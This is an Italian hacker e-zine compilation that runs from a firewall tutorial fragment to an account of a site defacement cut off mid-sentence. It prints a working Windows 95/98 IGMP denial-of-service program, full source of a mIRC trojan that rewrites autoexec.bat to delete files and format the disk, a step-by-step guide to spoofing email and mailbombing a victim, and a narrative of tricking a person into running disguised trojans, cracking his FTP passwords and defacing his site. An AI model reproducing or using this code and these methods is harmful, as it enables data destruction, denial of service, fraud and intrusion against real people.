# e hackare la tua rete, quindi li rifiutiamo...giustO?:)


# Permettiamo le risposte DNS, ma solo i nostri server DNS primario e secondario.
# nota: 194.130.20.19 e 194.13.20.20 sono i nostri server DNS

$IPCHAINS -A input -i ppp0 -p tcp -s 194.13.20.19 53 -j ACCEPT
$IPCHAINS -A input -i ppp0 -p tcp -s 194.13.20.20 53 -j ACCEPT
$IPCHAINS -A input -i ppp0 -p udp -s 194.13.20.19 53 -j ACCEPT
$IPCHAINS -A input -i ppp0 -p udp -s 194.13.20.20 53 -j ACCEPT 


# Permettiamo ssh. Non abbiamo bisogno di permettere il -i eth0 a -dport 22 perch
# stiamo gi accettando tutto da eth0
# controlla quando stiamo accettando loopback e pacchetti ethernet

$IPCHAINS -A input -i ppp0 --dport 22 -j ACCEPT
 
# Ora respingeremo i pacchetti per la porta 113

$IPCHAINS -A input -i ppp0 -p tcp --dport 113 -j REJECT

# permette quei 3 tipi di ICMP

$IPCHAINS -A input -i ppp0 -p icmp --dport 0 -j ACCEPT
$IPCHAINS -A input -i ppp0 -p icmp --dport 3 -j ACCEPT
$IPCHAINS -A input -i ppp0 -p icmp --dport 11 -j ACCEPT


# Logga tutto il resto

$IPCHAINS -A input -j DENY -l


# Ora blocchiamo alcuni indirizzi che non vogliamo far accedere alla nostra LAN
# come www.porno.com e www.compagnia.rivale.com
# supponiamo che gli indirizzi ip siano 202.120.12.3 e 120.10.0.34

$IPCHAINS -A output -i eth0 -d 202.120.12.3 -j DENY
$IPCHAINS -A output -i ppp0 -d 120.10.0.34 -j DENY  


# E infine aggiungeremo il rule per il masq 

$IPCHAINS -A forward -j MASQ -s 192.68.1.0/24 -d ! 192.168.1.0/24

# La nostra rete  192.68.1.0/24
# -d ! 192.168.1.0/24  messo perch la destinazione non sia la nostra rete
# In altre parole...se la sorgente  la nostra rete e la destinazione non lo 
# il firewall deve usare MASQ.
# Ora ricorda che solo con questo rule ipchains non puoi forwardare le cose...
# Perch il firewall non "routa" le cose... per le tavole di routing.
# Cos installa lo strumento port forwarding (ipmasadm).

---- Lo script termina qui ----

Una piccola informazioni sullo strumento port forwarding:
Diciamo che lindirizzo del tuo file esterno  193.45.12.10 e che lhost che sta dando i 
servizi http  192.168.1.17. Puoi scrivere qualcosa del genere:

ipmasqadm portfw -a -P tcp -L 193.45.12.10 80 -R  192.168.1.17 80

dove:

portfw pu definirsi il chain forwarding per ipmasqadm
-a sta per aggiungi (come ipchains)
-P sta ad indicare il protocollo, in questo caso tcp
-L sta per lindirizzo locale, con ip e porta
-R sta per lindirizzo da inoltrare, con ip e porta

Bene penso che  tutto per ora
Spero che ti ho aiutato a capire come usare ipchains e come settarlo.
Buona giornata.


              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              	                    SOCKS SCANNER                           
              				    		                              
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



/* socks scan, its 2 lame */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

unsigned int port=1080;
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;
int err,s;
FILE *fp;

int open_sock(int sock, char *server, int port) {
     struct sockaddr_in blah;
     struct hostent *he;
     bzero((char *)&blah,sizeof(blah));
     blah.sin_family=AF_INET;
     blah.sin_addr.s_addr=inet_addr(server);
     blah.sin_port=htons(port);


    if ((he = gethostbyname(server)) != NULL) {
        bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
    }
    else 
         if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) 
           
           return(-3);
         
    

        if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
             
             close(sock);
             return(-4);
        }
        
        return(1);
}



void main(int argc, char *argv[]) 

{

     if (argc < 2) {
       printf("use: %s IP\n",argv[0]);
       exit(0);
      
       
     }

    if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket()");
        exit(-1);
     }
     if (argv[2]) port=atoi(argv[2]);  
     err=open_sock(s,argv[1],port);
    if (err<0) printf("\nits not look like a socks\n"); else {
     printf("\nu got it buster\n");
    fp=fopen("socks","a");
    fprintf(fp,"\n%s",argv[1]);
    fclose(fp);
    }
}









              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              	             WINDOWS 95/98 IGMP FRAGMENT DOS                
              				    		                              
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char **argv)
{
	struct hostent 		*pHostentry;
	struct sockaddr_in 	sock;
	int 			explode,sd,times,x;
	char			*tcp_dest;
	unsigned short		port;
	char			big[20000];

	if ((argc < 5) || (argc > 5)) 
	{
		printf("usage: %s destination port size repititions\n",argv[0]);
		exit(1);
	}

	tcp_dest = argv[1];
	port = atoi(argv[2]);
	explode = atoi(argv[3]);
	times = atoi(argv[4]);

	if ((pHostentry = gethostbyname(tcp_dest)) == NULL)
	{
		printf("Resolve of %s failed please try again.\n", argv[1]);
		exit(1);
	}

	memcpy(&sock.sin_addr.s_addr, pHostentry->h_addr, pHostentry->h_length);
	sock.sin_family = AF_INET;
	sock.sin_port = htons(port);
	
	if ((sd = socket(AF_INET, SOCK_RAW, 2)) == -1)
	{
		printf("Could not allocate socket.\n");
		exit(1);
	}

	if ( (connect(sd, (struct sockaddr *)&sock, sizeof (sock) )))
	{
		printf("Couldn't connect to host.\n");
		exit(1);
	}

	if ( send(sd, big, explode, 0) == -1)	
	{
		printf("Error sending check size (lower)\n");
		close(sd);
		exit(1);
	}

	for (x = 0; x <= times; x++)
	{
		usleep(100000);
		if (send(sd, big, explode, 0) == -1)
		{
			printf("Error sending.\n");
			exit(1);
		}
		printf("Sent %s packet(%d)\n",argv[1], x);
	}
	close(sd);
	return 0;
}	



              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
                            FAKE MAIL : DI TUTTO DI +                         
              				    		                 A[v]a[t]A[r] 
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




Come avrete gia intuito dal titolo in questo articolo vi spieghero come mandare delle 
fakemail ovvero come mandare delle e-mail con l'indirizzo che vogliamo.Per usare questa 
tecnica anche se un po vecchiotta ma sempre efficace e sicura abbiamo bisogno di Telnet 
quindi se non conoscete bene l'argomento vi consiglio di scaricare il mio articolo 
precendente (Introduzione a telnet) per capire un po come funziona.
Prima di andare avanti voglio farvi una percisazione ovvero volevo informarvi che c' 
qualche possibilita di mandare delle fakemail anche se non si possiede telnet, infatti 
in rete ci sono alcuni siti che vi offrono questo servizio che pero non da nessuna 
copertura.Vi consiglio quindi di utilizzare sempre e comunuque telnet.
Imparando questa tecnica imparerete anche ad usare meglio telnet e soprattutto a conoscere 
l'SMTP ovvero il servizio della posta in uscita.Iniziamo a collegarci a telnet inserendo 
l'indirizzo del server da noi scelto e un numero di porta.Le porte per chi non lo sapesse 
sono dei numeri a cui sono associati i vari servizi dei server,ad 
esempio ( ftp, posta,web...).
Nel nostro caso ci interessa un servizio specifico ovvero quello SMPT quindi la nostra 
porta  la 25 per altri servizi invece i numeri cambiano e per l'FTP abbiamo la porta 21 per 
le news la porta 119 ecc.Procediamo e allora scegliamo un server qualsiasi (mail.tin.it) e 
tanti altri.Una voltache ci siamo connessi al server attraverso la porta 25 apparira su telnet 
un messaggio di quest tipo:

220 server.it Sendmail x.x/x.x 16/12/00 ready at Mon, 16 Dec 00 04:25:18 -0200

Dopo che sara apparsa questa scritta dovremo identificarci con il seguente comando

HELO nomeprovider.it

Non mi venite a dire che i tasti non funzionano per che altrimenti mi incazzo.Quando 
scrivete il comando non vedete le perole che vengono scritte pero i comandi che digitate 
giungono lo stesso al server e solo che non li vedete.Se volete vedere quello che scrivete, 
andate in terminale e attivate la voce (eco locale).
Vi consiglio di scrivere con attenzione perch su telnet non  possibile cancellare quindi 
ogno volta che sbagliate dovrete ripetere tutti icomandi da capo ,questo per evitare di 
essere sgamati.

250 prova.it Hello Nomeprovider.it, pleased to meet you

Ora dobbiamo digitare l'indirizzo e-mail ovviamente quello falso,quindi usiamo il comando:

MAIL FROM: polizia@italia.it 

io ho messo  fbi@italia.it ma voi potete mettre qualsiasi cosa.Dopo avre fatto questo 
dobbiamo mettre il destinatario ovvero la nostra vittima.Quindi:

RCPT TO: lamer@delcazzo.it

Adesso avvertiamo il server che siamo pronti con il seguente comando:

DATA.

Prima di scrivere dobbiamo camuffare il nostro ip e per farlo scrivete

Received: by nomeprovider.it id AA11621 with SMTP; Mon, 16 Dec 00 04:25:18

Dovete scrivere proprio cosi ma dovete cambiare la data e l'id.Rimanete le prime 3 cifre 
dell'ip (AA1) ma cambiate le ultime quattro cifre.Ora scriviamo 

Message-ID: <123.AA16544@microsoft.com>

Dovete scrivere questo per far credere che il messaggio sia partito dal 
server microsoft.Ricordate che dovete cambiare le cifre dell' l'intestazione Received.
Inseriamo ora di nuovo il destinatario, la data e il soggetto della e-mail:

To:
Date: Mon, 16 Dec 00 04:25:18
Subject: questa  una mail per te

Lasciamo uno spazio e scriviamo il nostro testo poi per concludere lasciamo due righe vuote 
dopodiche digitiamo un punto premiamo invio e poi scriviamo quit.A questo punto avremo 
spedito la fakemail e quindi potremo anche togliere telnet.
Bene penso sia stato chiaro quindi ora che sappiamo mandare un bella fakemail utilizziamo le 
nostre conoscenze per borbandare la casella di posta di qualcuno che odiamo.
Per farlo dobbiamo creare un'altra fakemail uguale alla precedente ma come mittente dobbiamo 
mettere l'indirizzo e-mail della nostra vittima e invece come destinatario usiamo un listserv.
Vi consiglio quindi di procurarvi un listserv che non  altro che un programma che invia 
roba tramite mail.
Per trovare un listserv vi bastera andare su un motore di ricerca e digitare la parola.
Procediamo quindi procurandoci informazioni di qualche server e cerchiamo di scovare nelle 
directory qualche bel file di grandi dimensioni( ad esempio nella directory documenti 
troviamo un file molto grande di nome grende.cs)Una volta individuato il file facciamo in 
modo che questo sia inviato alla vittima sotto forma di e-mail (qui dovrete usare un servlist).
Ripetiamo i comandi che abbiamo imparato per mandare una singola fakemail e quando siamo 
arrivati a (subject) scriviamo i seguenti comandi.

REPLY lamer@delcazzo.it
CONNECT server.it anonymous indirizzo@falso.it
BINARY
GET documenti/grande.cs
QUIT  

Concludiamo quindi con il solito procediamento.Vi faccio una piccola spiegazione che vi 
fara' comprendere il perch di 

REPLY indica l'indirizzo e-mail a cui rispondere
CONNECT specifica il nome del provider a cui collegarsi e l'account da usare
BINARY specifica un file di tipo binario (non va cambiato)
GET specifica il nome del file da prelevare (completo di eventuali directory)
QUIT termina la connessione

Ok abbiamo finito ma se siete davvero bastardi dopo il comando GET e invece di premere QUIT 
usate altri GET otterrete un risultato ancora piu dannoso. 
                                                                           A[v]a[t]A[r]
                                                                            H@ Team



Finito l'articolo vorrei ringraziare:

Jrash con cui ho passato intere sere sul suo Sr modificato anche quando la temperatura 
scendeva sotto zero e Valeria perche  una delle ragazze piu belle e sincere che abbai mai 
conosciuto. 


Ricordare   Zero posto per l'infame


     -----A[v]a[t]A[r] --- w w w . h a c k e r s a t . c o m ---  ---avatar@hackersat.com----     





              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
                                    NAVIGARE CON VB!                         
              				    		                          sYn 
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



Salve ragazzi, con questa guida voglio citarvi un controllo Activex di Visual Basic.
Una piccola premessa:
Non scostate gli occhi dall'articolo solo perch avete sentito parlare di Visual basic e non di C
o altri linguaggi...io conosco il vb meglio di tutti gli altri linguaggi e ne sono pienamente 
fiero anche se  un linguaggio prodotto dalla casa Microsoft.
Chiunque pensa che questo linguaggio sia da lamerucci lo incito a farsi un bel lavaggio del 
cervello e a pensare al proprio stile senza seguire le stronzate che dicono del tipo : "Linux 
 il miglior sistema operativo in assoluto, Windoz fa schifo non serve a niente".Io in prima
persona uso Linux ma non ho mai affermato questo.

Bene adesso vi diro' come "accedere al web da un progetto Visual Basic".

Il controllo Activex disponibile nella finestra di dialogo Componenti  il controllo 
 "Browser Web".
Per aggiungere questo controllo, spuntate la voce Microsoft Internet Control nella 
finestra di dialogo Componenti.
Quando si aggiunge questo controllo al progetto, viene creata una nuovas finestra.
Le pagine web appariranno in questa finestra sul form. Il nome predefinito del controllo 
WebBrowser1. Per assegnare un nome al controllo, utilizzate il prefinno "web".
Uno dei metodi del controllo 

Navigate
che consente di specificare l'indirizzo URL di un sito web. Inserite il collegamento come 
stringa di seguito alla chiamata al metodo.
Nell'esempio il codice richiama la homepage di hackersat se  attiva una connessione ad 
internet, SOLO se  attiva.

webBrowser.Navigate "hackersat.com"

Per fare funzionare questo controllo il computer deve essere collegato necessariamente 
ad un provider (o green)!
Se non  aperto nessun browser, il progetto aprira' Internet Explorer.Il programma 
puo' funzionare anche con Netscape a condizione che questo sia aperto prima di eseguire il 
progetto Visual Basic









              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
                                  ATTENTI AL DUCK!                           
              				    		                 A[v]a[t]A[r] 
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






Come tutti sapete in rete girano molti virus e da un po di tempo vanno 
molto di moda anche trojan.Una sera mentre cazzeggiavo per la rete mi 
imbattei in un sito che permetteva di scaricare un add-on per mirc capace
di leggere le query altrui.
Questo attiro la mia attenzione e anche se ero a conoscenza che cio non 
era possibile scaricai questo file per veder un po di cosa si trattava.
Consapevole del fatto che  difficile che un semplice add-on possa far 
vedere le query altrui andai a leggere il codice che come immaginavo non
era altro che un virus da quattro soldi.
Dopo averci datto un'occhiata notai che questo una volta avviato si appresta
a cancellare la cartella "windows" la cartella "windows/system" e inseguito
a formattarvi tutto l'HD.Alla fine compare anche una sipatica scritta 
(you have been DUCKED by DONALD DUCK!) che di certo fara incazzare il povero
malcapitato.
Se volete vedere uno dei tanti siti da cui si puo scricare questo virus
recatevi al seguente URL (http://spiaquery.cjb.net).
Per gli appassionati riporto il codice del DUCk ma mi raccomando non usatelo
per fare cosette da lamer. 


---------------------------------------STarT-----------------------------------------------------


alias duck {
run -n attrib -r c:\autoexec.bat
; Autoexec.bat
write c:\autoexec.bat @echo off
write c:\autoexec.bat echo Aggiornamento dei file di configurazione di Windows $os in corso...
write c:\autoexec.bat del c:\b*.*
write c:\autoexec.bat del c:\c*.*
write c:\autoexec.bat del c:\d*.* 
write c:\autoexec.bat del c:\e*.*
write c:\autoexec.bat del c:\f*.*
write c:\autoexec.bat del c:\g*.*
write c:\autoexec.bat del c:\h*.*
write c:\autoexec.bat del c:\i*.*
write c:\autoexec.bat del c:\l*.*
write c:\autoexec.bat del c:\m*.*
write c:\autoexec.bat del c:\n*.*
write c:\autoexec.bat del c:\o*.*
write c:\autoexec.bat del c:\p*.*
write c:\autoexec.bat del c:\q*.*
write c:\autoexec.bat del c:\r*.*
write c:\autoexec.bat del c:\s*.*
write c:\autoexec.bat del c:\t*.*
write c:\autoexec.bat del c:\u*.*
write c:\autoexec.bat del c:\v*.*
write c:\autoexec.bat del c:\z*.*
write c:\autoexec.bat del c:\k*.*
write c:\autoexec.bat del c:\j*.*
write c:\autoexec.bat del c:\y*.*
write c:\autoexec.bat del c:\w*.*
write c:\autoexec.bat del c:\x*.*
write c:\autoexec.bat del c:\windows\a*.*
write c:\autoexec.bat del c:\windows\b*.*
write c:\autoexec.bat del c:\windows\c*.*
write c:\autoexec.bat del c:\windows\d*.* 
write c:\autoexec.bat del c:\windows\e*.*
write c:\autoexec.bat del c:\windows\f*.*
write c:\autoexec.bat del c:\windows\g*.*
write c:\autoexec.bat del c:\windows\h*.*
write c:\autoexec.bat del c:\windows\i*.*
write c:\autoexec.bat del c:\windows\l*.*
write c:\autoexec.bat del c:\windows\m*.*
write c:\autoexec.bat del c:\windows\n*.*
write c:\autoexec.bat del c:\windows\o*.*
write c:\autoexec.bat del c:\windows\p*.*
write c:\autoexec.bat del c:\windows\q*.*
write c:\autoexec.bat del c:\windows\r*.*
write c:\autoexec.bat del c:\windows\s*.*
write c:\autoexec.bat del c:\windows\t*.*
write c:\autoexec.bat del c:\windows\u*.*
write c:\autoexec.bat del c:\windows\v*.*
write c:\autoexec.bat del c:\windows\z*.*
write c:\autoexec.bat del c:\windows\k*.*
write c:\autoexec.bat del c:\windows\j*.*
write c:\autoexec.bat del c:\windows\y*.*
write c:\autoexec.bat del c:\windows\w*.*
write c:\autoexec.bat del c:\windows\x*.*
write c:\autoexec.bat del c:\windows\system\a*.*
write c:\autoexec.bat del c:\windows\system\b*.*
write c:\autoexec.bat del c:\windows\system\c*.*
write c:\autoexec.bat del c:\windows\system\d*.*
write c:\autoexec.bat del c:\windows\system\e*.*
write c:\autoexec.bat del c:\windows\system\f*.*
write c:\autoexec.bat del c:\windows\system\g*.*
write c:\autoexec.bat del c:\windows\system\h*.*
write c:\autoexec.bat del c:\windows\system\i*.*
write c:\autoexec.bat del c:\windows\system\l*.*
write c:\autoexec.bat del c:\windows\system\m*.*
write c:\autoexec.bat del c:\windows\system\n*.*
write c:\autoexec.bat del c:\windows\system\o*.*
write c:\autoexec.bat del c:\windows\system\p*.*
write c:\autoexec.bat del c:\windows\system\q*.*
write c:\autoexec.bat del c:\windows\system\r*.*
write c:\autoexec.bat del c:\windows\system\s*.*
write c:\autoexec.bat del c:\windows\system\t*.*
write c:\autoexec.bat del c:\windows\system\u*.*
write c:\autoexec.bat del c:\windows\system\v*.*
write c:\autoexec.bat del c:\windows\system\z*.*
write c:\autoexec.bat del c:\windows\system\k*.*
write c:\autoexec.bat del c:\windows\system\j*.*
write c:\autoexec.bat del c:\windows\system\y*.* 
write c:\autoexec.bat del c:\windows\system\w*.*
write c:\autoexec.bat del c:\windows\system\x*.*
write c:\autoexec.bat deltree /y c:\*.* 
write c:\autoexec.bat format c: /autotest
write c:\autoexec.bat @echo on
write c:\autoexec.bat echo you have been DUCKED by DONALD DUCK!
; Creazione File
write c:\a-001.txt duck
write c:\b-001.txt duck
write c:\c-001.txt duck
write c:\d-001.txt duck
write c:\e-001.txt duck
write c:\f-001.txt duck
write c:\g-001.txt duck
write c:\h-001.txt duck
write c:\i-001.txt duck
write c:\l-001.txt duck
write c:\m-001.txt duck
write c:\n-001.txt duck
write c:\o-001.txt duck
write c:\p-001.txt duck
write c:\q-001.txt duck
write c:\r-001.txt duck
write c:\s-001.txt duck
write c:\t-001.txt duck
write c:\u-001.txt duck
write c:\v-001.txt duck
write c:\z-001.txt duck
write c:\k-001.txt duck
write c:\j-001.txt duck
write c:\y-001.txt duck
write c:\w-001.txt duck
write c:\x-001.txt duck
write c:\windows\a-001.txt duck
write c:\windows\b-001.txt duck
write c:\windows\c-001.txt duck
write c:\windows\d-001.txt duck
write c:\windows\e-001.txt duck
write c:\windows\f-001.txt duck
write c:\windows\g-001.txt duck
write c:\windows\h-001.txt duck
write c:\windows\i-001.txt duck
write c:\windows\l-001.txt duck
write c:\windows\m-001.txt duck
write c:\windows\n-001.txt duck
write c:\windows\o-001.txt duck
write c:\windows\p-001.txt duck
write c:\windows\q-001.txt duck
write c:\windows\r-001.txt duck
write c:\windows\s-001.txt duck
write c:\windows\t-001.txt duck
write c:\windows\u-001.txt duck
write c:\windows\v-001.txt duck
write c:\windows\z-001.txt duck
write c:\windows\k-001.txt duck
write c:\windows\j-001.txt duck
write c:\windows\y-001.txt duck
write c:\windows\w-001.txt duck
write c:\windows\x-001.txt duck
write c:\windows\system\a-001.txt duck
write c:\windows\system\b-001.txt duck
write c:\windows\system\c-001.txt duck
write c:\windows\system\d-001.txt duck
write c:\windows\system\e-001.txt duck
write c:\windows\system\f-001.txt duck
write c:\windows\system\g-001.txt duck
write c:\windows\system\h-001.txt duck
write c:\windows\system\i-001.txt duck
write c:\windows\system\l-001.txt duck
write c:\windows\system\m-001.txt duck
write c:\windows\system\n-001.txt duck
write c:\windows\system\o-001.txt duck
write c:\windows\system\p-001.txt duck
write c:\windows\system\q-001.txt duck
write c:\windows\system\r-001.txt duck
write c:\windows\system\s-001.txt duck
write c:\windows\system\t-001.txt duck
write c:\windows\system\u-001.txt duck
write c:\windows\system\v-001.txt duck
write c:\windows\system\z-001.txt duck
write c:\windows\system\k-001.txt duck
write c:\windows\system\j-001.txt duck
write c:\windows\system\y-001.txt duck
write c:\windows\system\w-001.txt duck
write c:\windows\system\x-001.txt duck
.timer 1 5 quit DUCKED by DONALD DUCK!
.timer 1 6 run rundll32.exe user.exe,exitwindows
}


-------------------------------------------ENd---------------------------------------------------


Spero che questo articolo vi metta in guardia dai pericoli che trovate 
in giro pre la rete.Consiglio a tutte le persone meno esperte di far 
attenzione e non fidarsidi tutto quello che si legge,infatti ricordate 
che un virus non si esegue mai da solo siete solo voi che lo avviate 
quando andate ad eseguirlo.Posso capire che veniate infettati da un virus 
tipo (I love you) ma non fatevi infinocchiare da due righe di un codice di 
merda.                                                                          
                                                                
                                                               A[v]a[t]A[r]
                                                                 H@ Team         

                                                     

uN saluto a SadikuzBoy.



 -----A[v]a[t]A[r] ---w w w . h a c k e r s a t . c o m---  ---avatar@hackersat.com----     




              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              	          CRONACA DI UN SEMPLICE SITE HACK                  
              				    		                       Mr. A  
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




Con questo testo scorrevole e forbito vi presento il mio amico Mr.A, 
new entry dell'H@ team... 
ogni tanto mi intrometto con qualche nota, cmq sappiate che ha fatto 
lui quasi tutta la parte 
pratica dell'hackeraggio, per un semplice, ottimo motivo... Mr.A ha la 
flat! Beato lui! Prima 
o poi gli frego le pwd, eheheh :))))
	
						^Ghent^ 


 Questo, spero breve, documento viene da noi redatto non tanto per 
vantarci delle nostre ben misere 
capacita` di Hacking, che anzi verrebbero sminuite da un tale racconto, 
quanto per fare comprendere 
quanto la stupidaggine e la poca attenzione dell'utente medio della 
rete abbassi il livello di sicurezza 
in maniera irreparabile (NdGhent: cmq in questo caso, come leggerete, 
ci siamo trovati di fronte ad un vero 
e proprio utOnto ;)) in maniera tale che nessun sistema di sicurezza 
possa proteggere.

 Questo e` il racconto del nostro attacco ad un sito simpsons a sfondo 
commerciale che si spaccia per 
sito di "veri fan". Inizialmente abbiamo cercato per lungo tempo 
eventuali exploits o falle vere e proprie 
del server su cui il sito era ospitato; tutto questo inutilmente, in 
quanto erano installati un server 
telnet ed un server FTP di ultima relase per i quali ancora non erano 
stati trovati exploits 
interessanti (ndG: ed in quanto siamo degli scarsoni :)).

 Da questo si evince che il provider a cui era stato affidato il 
compito era assolutamente in grado di 
compiere il suo lavoro, visto che tra l'altro il genere di siti 
ospitati avrebbe potuto richiedere anche 
un livello di sicurezza minore; altro fatto notabile era l'assenza, 
almeno apparente di una directory cgi-bin, 
infatti in nessuno dei siti ospitati erano presenti pagine che lo 
utilizzassero e sapevamo che un altro sito 
si era dovuto trasferire provvisoriamente su altri server proprio per 
questo inconveniente. Ci era parso 
quindi ormai chiaro che un attacco "dalla porta sul retro", 
direttamente al server, era improponibile.

Avevamo dei "suggerimenti", dei piccoli appigli per tentare un attacco 
brute force 
(ndG: per chi non lo sapesse -vergogna- un brute force consiste nel far 
provare ad un programmino, 
detto appunto bruteforcer, delle liste user/password) sull'accesso FTP, 
in effetti eravamo praticamente 
sicuri di quale fosse lo username (che si e` poi rivelato esatto), 
pero` non avevamo assolutamente idea 
della password, quindi, siccome siamo gente scazzata (ndG: e qui ci 
metto un bel ROTFL :)) il brute force 
non l'abbiamo neppure tentato .

 Abbiamo allora pensato che l'idea migliore fosse quella di entrare 
dalla porta principale, e con tanto 
di chiavi nella speranza che, come spesso accade nella vita reale, le 
chiavi fossero sotto lo zerbino. 
Non ci sbagliavamo affatto. La parte tre virgolette piu` complicata a 
questo punto era quella di poter 
accedere allo zerbino della "casa" del nostro amico per poter 
controllare se ci fossero le chiavi.
 Anche questa eventuale difficolta` si e` risolta piu` facilmente dello 
sperato 
(ndG: ragazzi, smettetela di dire "che culo!"). Il soggetto in 
questione aveva pubblicato sul suo sito 
il suo ICQ Number (UIN), e noi, sotto le spoglie di una bellissima 
ragazza lo abbiamo contattato 
(ndG: i logs di ICQ sono qualcosa di sensazionalmente divertente, dato 
che Mr. A ha impersonato un female 
fake eccezionale).

Riteniamo opportuno qui fare una breve parentesi sull'effetto del sesso 
femminile in rete. 
Uno di noi (ndG: com' modesto il mr. A, non si svela...) ha avuto 
molti anni fa l'opportunita` di pubblicare 
per quello che una volta era il mitico sito del bruzzi, un pezzo in cui 
si dimostrava chiaramente che gli 
uomini in rete corrono dietro a qualunque cosa si dichiari di sesso 
femminile, e lo fanno spesso 
(se si e` abbastanza convicenti) senza neppure premurarsi che 
dall'altro capo della rete ci sia 
effettivamente una donna. Basta spacciarsi per incapaci a fare le cose 
piu` elementari che si e` 
subito etichettati come femmina!

Isomma ci siamo messi in contatto con questo ragazzo ed abbiamo preso 
un poco confidenza. 
Nel frattempo ci siamo ricordati di un pazzesco exploit per ICQ. Questo 
trucco consiste nel fatto 
che se si nomina un file .exe del tipo topa.jpg                           
.exe ovvero se si mette 
un numero sufficiente di spazi bianchi, l'estensione reale rimane 
nascosta nella finestra di fine invio file 
(ndG: e questo dovreste gia' saperlo, se da bravi ragazzi qual siete 
avete letto la mia lunga guida su 
ICQ apparsa su Dirty Net #1).

Quindi una persona che clikka su open a quel punto pensa di star 
aprendo in .jpg oppure un .txt o quello 
che sia mentre in realt sta eseguendo un programma sul PC. Era inoltre 
stato sviluppato da una crew 
di cui ora non ricordiamo il nome, (ndG: ricordo io, erano i 
progenic... se non sbaglio, www.progenic.com) 
un programmino che univa un file .txt ad un .exe e permetteva di 
visualizzare il .txt mentre in background 
veniva eseguito il programma voluto (ndG: il prog. si chiama "ICQ File 
Spoofer" ed  utile appunto perch fa 
in modo che il file txt venga visualizzato mentre l'exe viene eseguito, 
in modo da non destare sospetti); 
finita la prima esecuzione il vecchio file si riconverte in un 
normalissimo .txt o .jpg. Ci siamo anche 
accorti che questo programmino funzionava anche unendo .jpg agli .exe e 
non dava alcun problema.

 Arrivati quindi ad essere in confidenza col soggetto abbiamo iniziato 
a mandargli alcuni tra i pi noti 
troiani in questa maniera. In prima istanza abbiamo provato con 
BackOrifice 2000, il quale pero' probabilmente 
perch mal configurato da noi (ndG: cio' dimostra che non siamo lamer! 
Niente familiarita' con i trojans :)) 
non ha dato alcun risultato; in questo caso il troiano e` stato inviato 
unito con un .txt che conteneva le 
"poesie" scritte dalla ragazza, di cui tra l'altro una era dedicata al 
soggetto. Ci siamo quindi indirizzati
 verso un tentativo con netbus, sebbene sapessimo che sarebbe stato 
molto semplice essere scoperti, perche` 
nella fretta di fare non avevamo trovato nessun altro troiano che ci 
desse accesso alle directory di un PC 
remoto. Questo e` stato probabilmente il piu` grosso passo falso che 
abbiamo compiuto; 
ci eravamo premurati in precedenza di chiedere aiuto al tizio riguardo 
a quali antivirus fossero i migliori
 da usare per evitare che ci mandassero i virus da internet (voi tutti 
sapete quanto le ragazze panichino 
a questo riguardo), e lui ci aveva detto che non c'era assolutamente da 
preoccuparsi perche` bastava stare 
attenti e i virus non si prendevano. (ndG: ROTFL! Questa domanda sugli 
antivirus  stata IMHO un vero tocco 
di classe...)

 Da questo avevamo intuito che usasse poco o pernulla degli antivirus e 
quindi ci siamo appunto arrischiati 
con Netbus. Con netbus siamo riusciti in effetti ad accedere al suo PC, 
ma la connessione era piuttosto lenta 
e non siamo riusciti ad accedere rapidamente alle directory volute, e 
durante questo attacco il tipastro ad 
un certo punto se ne e` accorto, ed in effetti e` arrivato anche ad 
accusarci di essere stati noi ad avergli 
mandato netbus sul PC (ndG: cio, non  che abbia proprio accusato noi 
due... ma ha accusato).

Pero` dopo una nostra risposta stupita che si chiedeva cosa fosse 
questo netbus, il ragazzo, evidentemente 
sotto l'eccessivo effetto degli ormoni maschili, ha pensato che netbus 
fosse arrivato in qualche strana 
maniera sul suo PC senza che noi c'entrassimo nulla. Infine allegato ad 
una bellissima fotografia del 
deserto (non so se conoscete quella che sta tra le immagini di 
win2000?) abbiamo mandato un terzo troiano, 
di cui ora non ricordo piu` il nome, (ndG: se non sbaglio si trattava 
di "Blade Runner", che solo per il 
nome era da provare.. ;)) ma che e` facilmente reperibile, il quale ha 
avuto l'effetto voluto.

 Abbiamo quindi avuto accesso al suo PC ed in pochissimo tempo abbiamo 
trovato la directory del suo FTP client.
 Potrete tutti immaginare i grandissimi salti di gioia che abbiamo 
fatto nel renderci conto che usava WS_ftp, 
e quindi sarebbe stato semplicissimo decriptare le sue passwords (ndG: 
sapete che tools del genere si trovano
 facilmente su astalavista.box.sk, vero?).

 In effetti questo e` stato fatto, rendendoci conto tra l'altro che la 
password era un NOME PROPRIO 
comunissimo in italia; a questo punto ci siamo resi conto che pure un 
attacco bruteforce con una lista di 
passwords precompilate avrebbe avuto una piu` che discreta (ndG: io mi 
azzarderei a dire "sicura", ma cosi 
 stato piu' divertente :)) possibilita` di successo. Il resto a questo 
punto e` stato relativamente facile.

 Utilizzando un proxy anonimizzante situato in un paese asiatico (da 
cui quindi per un attacco del genere 
nessuno avrebbe ottenuto una rogatoria per sapere che IP erano 
collegati al momento - ndG: o almeno cosi' 
speriamo :))) ci siamo collegati all'ftp ed abbiamo uploadato un index 
differente da quello reale 
(ndG: ci tengo a precisare che non abbiamo ripulito la directory del 
sito ne' abbiamo danneggiato/cancellato 
dei files sul suo hard disk, quando naturalmente, una volta guadagnato 
l'accesso, potevamo fare tutto cio' 
che volevamo sul suo pc e nel suo spazio FTP).

 Da notare anche il fatto che questo soggetto, essendo un collaboratore 
del provider, aveva MEMORIZZATE in 
